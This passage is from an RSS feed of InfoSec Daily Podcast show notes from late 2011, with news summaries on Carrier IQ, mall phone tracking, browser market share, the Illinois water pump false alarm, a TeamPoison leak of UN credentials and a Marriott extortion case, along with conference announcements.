<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schumer also sent a letter to Federal Trade Commission chairman Jon Leibowitz asking the FTC to look into whether Path&rsquo;s technology was legal in the U.S.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forest City has not abandoned plans for the survey, however. In a statement, a Forest City spokesperson said that the company was suspending the trial until it came up with a way for customers to opt out easily. Path Intelligence CEO Sharon Biggar told CNNMoney that she hopes to discuss her company&rsquo;s technology with Schumer directly, and that it was fundamentally no different from the type of tracking that online retailers do with &ldquo;cookies&rdquo; and other behavioral marketing tools. &ldquo;We are simply seeking to level the playing field for offline retailers,&rdquo; she said. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2011/12/01/statcounter-chrome-takes-25-7-of-global-market-overtaking-firefox/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2011/12/01/statcounter-chrome-takes-25-7-of-global-market-overtaking-firefox/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Web analytics company StatCounter, Google Chrome has surpassed Mozilla Firefox to become the second most used Web browser in the world after Internet Explorer.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m always a bit wary about StatCounter&rsquo;s claims, but I would be very surprised if Chrome </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">didn&rsquo;t</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> overtake Firefox at some point.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the UK, Chrome bumped Firefox to the third place back in July 2011 (also according to StatCounter).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Indeed, the trends are crystal clear. StatCounter&rsquo;s research arm, StatCounter Global Stats, reports that Chrome took 25.7 percent of the worldwide market last month (up from a mere 4.66 percent in November 2009) compared to Firefox&rsquo;s 25.23 percent.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft&rsquo;s Internet Explorer maintains a strong lead with 40.63 percent globally (and even 50.66 percent in the United States), but the graph below shows both IE and Firefox declining fast.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">StatCounter says its statistics are based on aggregate data collected on a sample exceeding 15 billion page views per month (4 billion from the US) from a network of 3 million+ websites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.wired.com/threatlevel/2011/11/water-pump-hack-mystery-solved/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/11/water-pump-hack-mystery-solved/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was the broken water pump heard &rsquo;round the world.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyberwar watchers took notice this month when a leaked intelligence memo claimed Russian hackers had remotely destroyed a water pump at an Illinois utility. The report spawned dozens of sensational stories characterizing it as the first-ever reported destruction of U.S. infrastructure by a hacker. Some described it as America&rsquo;s very own Stuxnet attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Except, it turns out, it wasn&rsquo;t. Within a week of the report&rsquo;s release, DHS bluntly contradicted the memo, saying that it could find no evidence that a hack occurred. In truth, the water pump simply burned out, as pumps are wont to do, and a government-funded intelligence center incorrectly linked the failure to an internet connection from a Russian IP address months earlier.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, in an exclusive interview with Threat Level, the contractor behind that Russian IP address says a single phone call could have prevented the string of errors that led to the dramatic false alarm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I could have straightened it up with just one phone call, and this would all have been defused,&rdquo; said Jim Mimlitz, founder and owner of </span><a href="http://wireless-telemetry.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Navionics Research</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, who helped set up the utility&rsquo;s control system. &rdquo;They assumed Mimlitz would never ever have been in Russia. They shouldn&rsquo;t have assumed that.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mimlitz&rsquo;s small integrator company helped set up the Supervisory Control and Data Acquisition system (SCADA) used by the Curran Gardner Public Water District outside of Springfield, Illinois, and provided occasional support to the district. His company specializes in SCADA systems, which are used to control and monitor infrastructure and manufacturing equipment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mimlitz says last June, he and his family were on vacation in Russia when someone from Curran Gardner called his cell phone seeking advice on a matter and asked Mimlitz to remotely examine some data-history charts stored on the SCADA computer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mimlitz, who didn&rsquo;t mention to Curran Gardner that he was on vacation in Russia, used his credentials to remotely log in to the system and check the data. He also logged in during a layover in Germany, using his mobile phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I wasn&rsquo;t manipulating the system or making any changes or turning anything on or off,&rdquo; Mimlitz told Threat Level.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But five months later, when a water pump failed, that Russian IP address became the lead character in a 21st-century version of a Red Scare movie.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/authentication/167901072/security/attacks-breaches/232200523/hacktivists-crack-united-nations-publish-user-data.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/authentication/167901072/security/attacks-breaches/232200523/hacktivists-crack-united-nations-publish-user-data.html</span></a><br />
	<a href="http://nakedsecurity.sophos.com/2011/11/29/united-nations-hacked-email-addresses-and-passwords-leaked/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/11/29/united-nations-hacked-email-addresses-and-passwords-leaked/</span></a><br />
	<a href="http://webcache.googleusercontent.com/search?q=cache:w1pWVkm8FhkJ:pastebin.com/FEcE9WzJ+&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://webcache.googleusercontent.com/search?q=cache:w1pWVkm8FhkJ:pastebin.com/FEcE9WzJ+&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacktivist group called TeamPoison (TeaMP0isoN) has leaked more than 100 usernames, email addresses, and passwords belonging to the United Nations, claiming that the UN is guilty of corruption.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The user data appears to belong to individuals at the United Nations Development Programme (UNDP), Organisation for Economic Co-operation and Development (OECD), UNICEF, World Health Organisation (WHO), and other groups, according to news reports.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The gang noted, when publishing its stash on PasteBin, that some of the user IDs appeared to have a blank password.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reports indicate that the hackers were able to take advantage of a vulnerability on the United Nations Development Program website to extract the IDs, email address, and passwords of users. The UN told reporters that the information obtained was from an old server and contains no current or valuable information. The accounts obtained are no longer active, the UN says.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The UN is not saying exactly how the attack occurred. &quot;The question now is how?,&quot; the hacktivist group said. &quot;We will let the so called &#39;security experts&#39; over at the UN figure that out. Have a nice day.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TeamPoison recently announced that it is joining forces with Anonymous on a new initiative dubbed &quot;Operation Robin Hood,&quot; targeting banks and financial institutions.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-535-ciqios-mall-tracking-abandoned-chrome-takeover-water-pump-follow-up-tea-teamp0ison/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3220/0/infosec-daily-podcast-episode-535.mp3" length="18309055" type="audio/mpeg" />
		<itunes:duration>0:38:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 535 for December 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 535 for December 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	AIDE 2012 
	When: May 21-25, 2012 
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	The call for papers is open
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://gizmodo.com/5864107/yes-your-iphone-is-tracking-you-with-carrieriq-too
	All hell broke loose yesterday when it was discovered that most (but not all) Android phones (and BlackBerries, and others) are recording every keystroke you make. Now, references to the same software have been discovered in Apple&#39;s iOS. But in this case, it only logs technical data and it&#39;s off by default.
	Last night, prominent iOS hacker chpwn tweeted that he had found reference to the same, now notorious Carrier IQ software in iOS 3. After just a little more poking and prodding, it was confirmed that these references exist all the way up to modern day iOS 5, they&#39;re just under a different name: /usr/bin/awd_ice2. But wait, before everyone starts returning their iPhones (none of you were going to do that anyway), there&#39;s a bit of good news.
	It seems that the data Carrier IQ has access to is much more limited than it is on Android. From chpwn&#39;s blog: &#34;&#8230;it does not appear the daemon has any access or communication with the UI layer, where text entry is done.&#34; That is extremely good news if it proves to be true, because it would mean that iOS wouldn&#39;t be logging your passwords, emails, SMS messages, etc. Even more good news: CarrierIQ only kicks in when the iPhone is in Diagnostic Mode, which is off by default. So you&#39;d have to actively tinker with settings you never use for it to work.
	When activated, though, CarrierIQ does appear to log your name, phone number, carrier information, some info about the calls you are making, and your location (if Location Services are enabled). There may well be more, they just haven&#39;t found it yet. We&#39;ll update as we learn more.
	Source: http://www.wired.com/epicenter/2011/11/mall-pull-plug-cell-tracking/
	You may now shop two malls again without fear of individualized tracking&#8212;at least by your cell phone signal. Privacy concerns raised by US Senator Charles Schumer (D-NY) have ended plans by malls in southern California and Virginia to &#8220;survey&#8221; customers&#8217; shopping habits by tracking their cell phone signals.
	As Ars Technica previously reported, Forest City, the mall developer that owns and operates the Promenade Temecula in Temecula, California and Short Pump [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 534 &#8211; Deceived Hacker, 15 Years For 1 Click, We’re No. 1!, Banned In The UK, Cure Worse Than The Disease and EU: ISP’s Aren’t Content Police</title>
		<link>http://www.isdpodcast.com/episode-534-deceived-hacker-15-years-for-1-click-we%e2%80%99re-no-1-banned-in-the-uk-cure-worse-than-the-disease-and-eu-isp%e2%80%99s-aren%e2%80%99t-content-police</link>
		<comments>http://www.isdpodcast.com/episode-534-deceived-hacker-15-years-for-1-click-we%e2%80%99re-no-1-banned-in-the-uk-cure-worse-than-the-disease-and-eu-isp%e2%80%99s-aren%e2%80%99t-content-police#comments</comments>
		<pubDate>Thu, 01 Dec 2011 02:11:28 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3215</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 534 for November 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 534 for November 30, 2011. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Keith Pachulski.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.networkworld.com/news/2011/112411-hungarian-hacks-marriotts-systems-to-253458.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.networkworld.com/news/2011/112411-hungarian-hacks-marriotts-systems-to-253458.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Hungarian citizen has pleaded guilty to stealing confidential information from the computers of Marriott International, and threatening to reveal the information if the hotel chain did not offer him a job maintaining the company&#39;s computers, the Department of Justice said on Wednesday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attila Nemeth, 26, pleaded guilty in the District of Maryland before U.S. District Judge J. Frederick Motz, according to a statement by DOJ. He was detained after he traveled to the U.S. on a ticket purchased by Marriott for a fictitious job interview.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nemeth is said to have admitted that he used an infected email attachment sent to some Marriott employees to install malicious software on the company&#39;s system that gave him a &quot;backdoor&quot; access to proprietary email and other files.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nemeth sent an email to Marriott staff on Nov. 11 last year, informing them that he had been accessing Marriott&#39;s computers for months and had obtained proprietary information, according to Nemeth&#39;s plea agreement. He threatened to reveal the information if Marriott did not give him a job maintaining the company&#39;s computers. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.smh.com.au/world/thai-crackdown-on-facebook-remarks-on-king-20111125-1nz1t.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.smh.com.au/world/thai-crackdown-on-facebook-remarks-on-king-20111125-1nz1t.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thailand has warned users of Facebook that they could face prosecution under harsh lese-majeste laws if they press &#39;&#39;share&#39;&#39; or &#39;&#39;like&#39;&#39; on images or articles considered unflattering to the Thai monarchy.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The prosecution of a Thai-born US citizen who has pleaded guilty to translating a banned biography of King Bhumibol Adulyadej has signalled that authorities are also targeting lese-majeste offences committed overseas.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thailand&#39;s Information and Communications Technology Minister, Anudith Nakornthap, says that even though Facebook clicks of &#39;&#39;like&#39;&#39; or &#39;&#39;share&#39;&#39; are only done to show support for messages, they could violate laws that carry sentences of three to 15 years jail for each charge.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.echannelline.com/usa/brief.cfm?item=18717"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.echannelline.com/usa/brief.cfm?item=18717</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google replaced Microsoft as the number one vendor for reported vulnerabilities, with a total of 82, due to existing vulnerabilities in Chrome as the browser grows in popularity. Oracle came in second, with 63; Microsoft fell to third place, with 58, all according to</span><a href="http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/3q_2011_threat_roundup.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Trend Micro&#39;s Third Quarter Threat Report</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
